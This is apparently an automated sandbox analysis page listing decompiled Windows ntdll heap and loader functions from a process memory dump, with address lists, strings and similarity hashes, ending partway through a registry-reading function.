                                                  0x00000000
                                                  0x01629fec
                                                  0x00000000
                                                  0x015ead73
                                                  0x015ead73
                                                  0x015ead73
                                                  0x015ead75
                                                  0x015ead75
                                                  0x015ead78
                                                  0x01629ff6
                                                  0x01629ffc
                                                  0x0162a003
                                                  0x0162a00e
                                                  0x0162a010
                                                  0x0162a01b
                                                  0x0162a01b
                                                  0x0162a01b
                                                  0x0162a038
                                                  0x0162a038
                                                  0x0162a003
                                                  0x015ead84
                                                  0x015ead89
                                                  0x015ead8c
                                                  0x015ead8e
                                                  0x0162a042
                                                  0x0162a045
                                                  0x00000000
                                                  0x00000000
                                                  0x0162a054
                                                  0x00000000
                                                  0x015ead94
                                                  0x015ead94
                                                  0x015ead94
                                                  0x015ead96
                                                  0x015ead96
                                                  0x015ead99
                                                  0x0162a063
                                                  0x0162a065
                                                  0x0162a070
                                                  0x0162a070
                                                  0x0162a070
                                                  0x0162a08d
                                                  0x0162a08d
                                                  0x015eada4
                                                  0x015eada6
                                                  0x00000000
                                                  0x015eada6
                                                  0x015ead8e
                                                  0x015ead6d
                                                  0x015ead3c
                                                  0x015ead3c
                                                  0x00000000
                                                  0x015ead3c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015eacd8

                                                  Strings
                                                  • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0162A0CD
                                                  • HEAP[%wZ]: , xrefs: 0162A0AD
                                                  • HEAP: , xrefs: 0162A0BA
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                  • API String ID: 0-1340214556
                                                  • Opcode ID: 00f72f853fdf87c24be886541df763f696894c3bc6d5dcf8a00ac19cb96b1602
                                                  • Instruction ID: 1d92325c35f70c32ba1bef356cd08c5c199213487831ee357c1b06257e7db444
                                                  • Opcode Fuzzy Hash: 00f72f853fdf87c24be886541df763f696894c3bc6d5dcf8a00ac19cb96b1602
                                                  • Instruction Fuzzy Hash: 8D81E231600A95EFE72ACBACCD88BA9BBF8FB05314F0445A5E5518B792D379E940CB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015DB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E015DB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0167A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x16a8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E015BB150();
					__eflags =  *0x16a7bc8;
					if(__eflags == 0) {
						E01672073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0167A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x16a8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x16a8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E015DB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0167A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E015DE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                  0x015db746
                                                  0x015db74b
                                                  0x015db74d
                                                  0x015db750
                                                  0x015db755
                                                  0x015db758
                                                  0x015db758
                                                  0x015db75e
                                                  0x015db763
                                                  0x015db764
                                                  0x015db76a
                                                  0x015db76d
                                                  0x015db771
                                                  0x015db776
                                                  0x015db85c
                                                  0x015db85d
                                                  0x015db860
                                                  0x015db865
                                                  0x01622ba1
                                                  0x01622ba2
                                                  0x01622ba9
                                                  0x01622bae
                                                  0x01622bae
                                                  0x015db77c
                                                  0x015db77c
                                                  0x015db77c
                                                  0x015db785
                                                  0x015db788
                                                  0x01622bb6
                                                  0x01622bb9
                                                  0x00000000
                                                  0x00000000
                                                  0x01622bbf
                                                  0x01622bc5
                                                  0x01622bc9
                                                  0x01622be8
                                                  0x01622bed
                                                  0x01622bcb
                                                  0x01622be0
                                                  0x01622be5
                                                  0x01622bf3
                                                  0x01622bf8
                                                  0x01622bfd
                                                  0x01622c05
                                                  0x01622c0e
                                                  0x01622c0e
                                                  0x00000000
                                                  0x015db78e
                                                  0x015db78e
                                                  0x015db78e
                                                  0x015db791
                                                  0x015db791
                                                  0x015db797
                                                  0x015db797
                                                  0x015db79f
                                                  0x015db7a9
                                                  0x015db7af
                                                  0x015db7af
                                                  0x015db7b1
                                                  0x015db7b6
                                                  0x015db7e2
                                                  0x015db7e2
                                                  0x015db7e7
                                                  0x015db880
                                                  0x015db7ed
                                                  0x015db7ed
                                                  0x015db7ed
                                                  0x015db7ef
                                                  0x015db7f2
                                                  0x015db7f2
                                                  0x015db7f5
                                                  0x015db7fa
                                                  0x01622c2d
                                                  0x01622c2e
                                                  0x01622c39
                                                  0x015db800
                                                  0x015db800
                                                  0x015db802
                                                  0x015db805
                                                  0x015db808
                                                  0x015db808
                                                  0x015db80a
                                                  0x015db80d
                                                  0x015db816
                                                  0x015db81c
                                                  0x015db822
                                                  0x015db82f
                                                  0x015db88b
                                                  0x015db892
                                                  0x015db897
                                                  0x015db899
                                                  0x015db89b
                                                  0x015db89e
                                                  0x015db8a5
                                                  0x015db8a8
                                                  0x015db8aa
                                                  0x015db8ac
                                                  0x015db8ac
                                                  0x015db8aa
                                                  0x015db892
                                                  0x015db831
                                                  0x015db839
                                                  0x015db83b
                                                  0x015db83b
                                                  0x015db844
                                                  0x015db84b
                                                  0x015db852
                                                  0x015db7b8
                                                  0x015db7ba
                                                  0x015db7bf
                                                  0x015db7c4
                                                  0x01622c18
                                                  0x01622c19
                                                  0x01622c23
                                                  0x015db7ca
                                                  0x015db7ca
                                                  0x015db7cc
                                                  0x015db7cf
                                                  0x015db7d1
                                                  0x015db7d1
                                                  0x015db7d4
                                                  0x015db7dc
                                                  0x015db8bb
                                                  0x015db8bb
                                                  0x015db8be
                                                  0x015db8be
                                                  0x015db8c1
                                                  0x00000000
                                                  0x00000000
                                                  0x015db8c3
                                                  0x015db8c5
                                                  0x015db8c7
                                                  0x015db8e0
                                                  0x00000000
                                                  0x015db8e0
                                                  0x015db8cc
                                                  0x015db8cc
                                                  0x00000000
                                                  0x015db8cc
                                                  0x015db8d6
                                                  0x015db8d6
                                                  0x00000000
                                                  0x015db7dc
                                                  0x015db7b6

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                  • API String ID: 0-1334570610
                                                  • Opcode ID: 5497b3d6d844328a03498bc77a5870921dea9f56f3dfae79a8701d454f232606
                                                  • Instruction ID: e356bb0465e97fd1bf73889888f76affea9d730275e6add2a5760c4ec4d90e59
                                                  • Opcode Fuzzy Hash: 5497b3d6d844328a03498bc77a5870921dea9f56f3dfae79a8701d454f232606
                                                  • Instruction Fuzzy Hash: DB61B170600242DFDB29CF2CC885B6ABBE6FF46305F5A855EE8498F241D771E891CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E015C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E015CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E015BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x16a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01635510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x16a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E015D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01637016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E015D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E015D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01637016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E015EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E015BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                  0x015c7e4c
                                                  0x015c7e50
                                                  0x015c7e55
                                                  0x015c7e58
                                                  0x015c7e5d
                                                  0x015c7e71
                                                  0x015c7f33
                                                  0x015c7e77
                                                  0x015c7e77
                                                  0x015c7e79
                                                  0x015c7e79
                                                  0x015c7e7e
                                                  0x015c7f45
                                                  0x01619848
                                                  0x00000000
                                                  0x01619848
                                                  0x015c7f4e
                                                  0x015c7f53
                                                  0x015c7f5a
                                                  0x00000000
                                                  0x00000000
                                                  0x0161985a
                                                  0x01619862
                                                  0x01619866
                                                  0x00000000
                                                  0x0161986c
                                                  0x00000000
                                                  0x0161986c
                                                  0x015c7e84
                                                  0x015c7e84
                                                  0x015c7e8d
                                                  0x01619871
                                                  0x015c7eb8
                                                  0x015c7ec0
                                                  0x015c7ec0
                                                  0x015c7e9a
                                                  0x0161987e
                                                  0x00000000
                                                  0x00000000
                                                  0x01619884
                                                  0x0161988b
                                                  0x016198a7
                                                  0x016198ac
                                                  0x016198b1
                                                  0x016198b6
                                                  0x016198b8
                                                  0x016198b8
                                                  0x016198b9
                                                  0x00000000
                                                  0x016198b9
                                                  0x015c7ea0
                                                  0x015c7ea7
                                                  0x00000000
                                                  0x00000000
                                                  0x015c7eac
                                                  0x015c7eb1
                                                  0x015c7ec6
                                                  0x015c7ed0
                                                  0x016198cc
                                                  0x015c7ed6
                                                  0x015c7ed6
                                                  0x015c7ed6
                                                  0x015c7ede
                                                  0x015c7ee3
                                                  0x016198e3
                                                  0x016198f0
                                                  0x01619902
                                                  0x016198f2
                                                  0x016198fb
                                                  0x016198fb
                                                  0x01619907
                                                  0x0161991d
                                                  0x0161991d
                                                  0x01619907
                                                  0x016198e3
                                                  0x015c7ef0
                                                  0x015c7f14
                                                  0x015c7f14
                                                  0x015c7f1e
                                                  0x01619946
                                                  0x015c7f24
                                                  0x015c7f24
                                                  0x015c7f24
                                                  0x015c7f2c
                                                  0x0161996a
                                                  0x01619975
                                                  0x01619975
                                                  0x0161997e
                                                  0x01619993
                                                  0x01619993
                                                  0x0161997e
                                                  0x00000000
                                                  0x015c7ef2
                                                  0x015c7efc
                                                  0x015c7f0a
                                                  0x015c7f0e
                                                  0x01619933
                                                  0x00000000
                                                  0x01619933
                                                  0x00000000
                                                  0x015c7f0e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015c7eb1

                                                  Strings
                                                  • Could not validate the crypto signature for DLL %wZ, xrefs: 01619891
                                                  • LdrpCompleteMapModule, xrefs: 01619898
                                                  • minkernel\ntdll\ldrmap.c, xrefs: 016198A2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                  • API String ID: 0-1676968949
                                                  • Opcode ID: c4293e84109de1d3b56a7d7a86bd61319428e9b4b1cffd1857d17ce5e68617eb
                                                  • Instruction ID: f285a79ad00380a63a55908ddaf094bc3e764d298b403e5cb48fde159377ded9
                                                  • Opcode Fuzzy Hash: c4293e84109de1d3b56a7d7a86bd61319428e9b4b1cffd1857d17ce5e68617eb
                                                  • Instruction Fuzzy Hash: BB51DF326007429FEB21CFADC994B2A7BE4BB49B18F080999E9519FBD1D770E900CF51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 016623E3 Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 64%
                                                  			E016623E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0x16a874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0x16a874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E0160D4F0(_t83, 0x1596c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E015BB150();
					} else {
						E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E015BB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x16a6378 = 1;
						asm("int3");
						 *0x16a6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                  0x016623e3
                                                  0x016623e8
                                                  0x016623eb
                                                  0x016623ee
                                                  0x016623f3
                                                  0x0166259b
                                                  0x0166259b
                                                  0x0166259d
                                                  0x016625a3
                                                  0x016625a3
                                                  0x016623fb
                                                  0x01662424
                                                  0x0166244f
                                                  0x01662460
                                                  0x01662451
                                                  0x01662451
                                                  0x01662456
                                                  0x01662458
                                                  0x01662458
                                                  0x0166245b
                                                  0x0166245b
                                                  0x01662426
                                                  0x01662431
                                                  0x01662436
                                                  0x01662443
                                                  0x01662438
                                                  0x01662438
                                                  0x01662438
                                                  0x01662445
                                                  0x01662445
                                                  0x01662463
                                                  0x01662469
                                                  0x0166246f
                                                  0x01662480
                                                  0x01662495
                                                  0x016624a1
                                                  0x016624ce
                                                  0x016624df
                                                  0x016624d0
                                                  0x016624d0
                                                  0x016624d5
                                                  0x016624d7
                                                  0x016624d7
                                                  0x016624da
                                                  0x016624da
                                                  0x016624a3
                                                  0x016624b0
                                                  0x016624b5
                                                  0x016624c2
                                                  0x016624b7
                                                  0x016624b7
                                                  0x016624b7
                                                  0x016624c4
                                                  0x016624c4
                                                  0x016624e8
                                                  0x01662497
                                                  0x0166249a
                                                  0x0166249a
                                                  0x01662482
                                                  0x01662488
                                                  0x01662488
                                                  0x01662471
                                                  0x01662479
                                                  0x01662479
                                                  0x016624ef
                                                  0x016623fd
                                                  0x01662401
                                                  0x01662412
                                                  0x01662403
                                                  0x01662403
                                                  0x01662408
                                                  0x0166240a
                                                  0x0166240a
                                                  0x0166240d
                                                  0x0166240d
                                                  0x0166241b
                                                  0x0166241b
                                                  0x016624f1
                                                  0x016624f6
                                                  0x01662507
                                                  0x01662510
                                                  0x00000000
                                                  0x01662510
                                                  0x0166250b
                                                  0x00000000
                                                  0x016624f8
                                                  0x016624f8
                                                  0x016624fc
                                                  0x01662500
                                                  0x01662512
                                                  0x01662515
                                                  0x0166251a
                                                  0x01662521
                                                  0x01662524
                                                  0x01662529
                                                  0x0166252f
                                                  0x00000000
                                                  0x00000000
                                                  0x0166253c
                                                  0x0166255c
                                                  0x01662561
                                                  0x0166253e
                                                  0x01662554
                                                  0x01662559
                                                  0x0166256a
                                                  0x0166256d
                                                  0x01662574
                                                  0x01662586
                                                  0x01662588
                                                  0x0166258f
                                                  0x01662590
                                                  0x01662590
                                                  0x01662597
                                                  0x00000000
                                                  0x01662597

                                                  Strings
                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 0166256F
                                                  • HEAP[%wZ]: , xrefs: 0166254F
                                                  • HEAP: , xrefs: 0166255C
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                  • API String ID: 0-3815128232
                                                  • Opcode ID: 3663e02c9ed6e055abcf415c79402b7fedc891c08caaee0c3cab34d1c058926c
                                                  • Instruction ID: 7137b1cac414a1ec80c82efebf455f8e6309c54cfad9176646d6c0ac3e3aca14
                                                  • Opcode Fuzzy Hash: 3663e02c9ed6e055abcf415c79402b7fedc891c08caaee0c3cab34d1c058926c
                                                  • Instruction Fuzzy Hash: 105125341012508AE334CF2ECCA47727BF9EB88644F54489DE8C28B285D779D847DB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015BE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 93%
                                                  			E015BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E015BF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E015F95D0();
						}
						if(_t78 != 0) {
							L015D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E015FFA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E015FBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
